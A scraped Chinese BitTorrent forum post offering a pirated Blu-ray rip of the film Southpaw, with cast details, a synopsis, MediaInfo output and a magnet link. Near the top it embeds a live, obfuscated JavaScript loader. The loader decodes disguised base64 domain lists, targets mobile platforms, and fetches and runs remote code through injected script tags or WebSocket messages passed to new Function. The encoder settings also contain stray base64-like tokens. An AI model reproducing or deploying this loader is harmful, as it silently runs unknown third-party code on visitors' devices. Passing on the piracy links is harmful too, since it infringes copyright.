铁拳[双语字幕]Southpaw.2015.1080p.BluRay.x264.DTS-迅雷下载 12.69GB

版主小s 17天前 183

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 铁拳 / 震撼擂台(台) / 再战击情(港) / 左撇子

◎片 名 Southpaw

◎年 代 2015

◎产 地 美国 / 中国大陆

◎类 别 剧情 / 动作 / 运动

◎语 言 英语

◎上映日期 2016-09-02(中国大陆) / 2015-07-24(美国)

◎IMDb链接 https://www.imdb.com/title/tt1798684/

◎豆瓣评分 7.4/10 (35099人评价)

◎豆瓣链接 https://movie.douban.com/subject/5446197/

◎片 长 123分钟

◎导 演 安东尼·福奎阿 Antoine Fuqua (id:1013907)

◎编 剧 科特·萨特 Kurt Sutter (id:1325346)

◎演 员 杰克·吉伦哈尔 Jake Gyllenhaal (id:1048002)

福里斯特·惠特克 Forest Whitaker (id:1053567)

瑞秋·麦克亚当斯 Rachel McAdams (id:1053587)

乌娜·劳伦斯 Oona Laurence (id:1350979)

50分 50 Cent (id:1009282)

司盖兰·布鲁克斯 Skylan Brooks (id:1350980)

娜奥米·哈里斯 Naomie Harris (id:1049542)

维克托·奥尔蒂斯 Victor Ortiz (id:1341465)

博·纳普 Beau Knapp (id:1342556)

米格尔·戈麦斯 Miguel Gomez (id:1341632)

约翰·塞纳迭姆博 John Cenatiempo (id:1074569)

克莱尔·弗利 Clare Foley (id:1321480)

瑞塔·奥拉 Rita Ora (id:1342695)

露皮塔·尼永奥 Lupita Nyong'o (id:1334862)

杰森·布鲁门塔尔 Jason Blumenthal (id:1448830)

安东尼·福奎阿 Antoine Fuqua (id:1013907)

许馨文 Xin-wen Xu (id:1436841)

詹姆斯·霍纳 James Horner (id:1025277)

摩洛·斐欧拉 Mauro Fiore (id:1283756)

◎标 签 拳击 / 励志 / 美国 / 运动 / 剧情 / 亲情 / 2015 / 传记

◎简 介

曾经,比利(杰克·吉伦哈尔 Jake Gyllenhaal 饰)凭借着他凶猛冷酷的左拳享誉拳坛,一时之间无人能敌,是当之无愧的拳王。然而,一场意外的发生让比利失去了挚爱的妻子莫林(瑞秋·麦克亚当斯 Rachel McAdams 饰),这场悲剧彻底打垮了比利,他开始自暴自弃,不仅放弃了事业,甚至开始酗酒吸毒,因此,他被剥夺了女儿蕾拉(奥娜·劳伦斯 Oona Laurence 饰)的抚养权,蕾拉被送入了福利机构。

女儿的离去让比利渐渐清醒了过来,他对自己糟糕的现状失望透顶,决定痛改前非。比利希望能够重新站在拳击擂台之上,他找到了教练威尔斯(福里斯特·惠特克 Forest Whitaker 饰),希望他能够帮助自己,夺回失去的一切。

◎获奖情况 (共1项)

第18届上海国际电影节 (2015)

金爵奖 最佳影片(提名)

└──安东尼·福奎阿 (id:1013907)

  1. General

  2. Unique ID : 63345299269103560284164125893345707503 (0x2FA7DC61F77BF07315CAD164634085EF)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.7 GiB

  7. Duration : 2 h 3 min

  8. Overall bit rate : 14.7 Mb/s

  9. Encoded date : UTC 2021-07-12 03:08:17

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 2 h 3 min

  22. Bit rate : 13.0 Mb/s

  23. Width : 1 920 pixels

  24. Height : 796 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.356

  33. Stream size : 11.3 GiB (89%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=7 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 3 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.30 GiB (10%)

  54. Title : eng

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 59 min

  65. Bit rate : 73.8 kb/s

  66. Count of elements : 4557

  67. Stream size : 63.0 MiB (0%)

  68. Title : chs&eng

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 59 min

  79. Bit rate : 71.4 kb/s

  80. Count of elements : 4557

  81. Stream size : 61.0 MiB (0%)

  82. Title : cht&eng

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 59 min

  93. Bit rate : 45.3 kb/s

  94. Count of elements : 4556

  95. Stream size : 38.7 MiB (0%)

  96. Title : chs

  97. Language : Chinese

  98. Default : No

  99. Forced : No


  100. Text #4

  101. ID : 6

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 59 min

  107. Bit rate : 45.7 kb/s

  108. Count of elements : 4556

  109. Stream size : 39.0 MiB (0%)

  110. Title : cht

  111. Language : Chinese

  112. Default : No

  113. Forced : No


  114. Text #5

  115. ID : 7

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 59 min

  121. Bit rate : 63.2 kb/s

  122. Count of elements : 4566

  123. Stream size : 54.1 MiB (0%)

  124. Title : eng

  125. Language : English

  126. Default : No

  127. Forced : No


  128. Menu

  129. 00:00:00.000 : 第 01 章

  130. 00:08:49.695 : 第 02 章

  131. 00:12:58.569 : 第 03 章

  132. 00:20:00.657 : 第 04 章

  133. 00:23:40.085 : 第 05 章

  134. 00:29:34.147 : 第 06 章

  135. 00:34:59.555 : 第 07 章

  136. 00:39:44.298 : 第 08 章

  137. 00:45:46.285 : 第 09 章

  138. 00:52:38.655 : 第 10 章

  139. 00:59:28.815 : 第 11 章

  140. 01:07:08.733 : 第 12 章

  141. 01:12:49.823 : 第 13 章

  142. 01:18:14.481 : 第 14 章

  143. 01:23:40.056 : 第 15 章

  144. 01:29:40.416 : 第 16 章

  145. 01:37:00.147 : 第 17 章

  146. 01:45:19.896 : 第 18 章

  147. 01:55:01.060 : 第 19 章

  148. 01:59:38.504 : 第 20 章


TAGS 动作 剧情 运动

磁力链:
  • magnet:?xt=urn:btih:274F21773536B855960A718557FB8D00743CB5C1
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回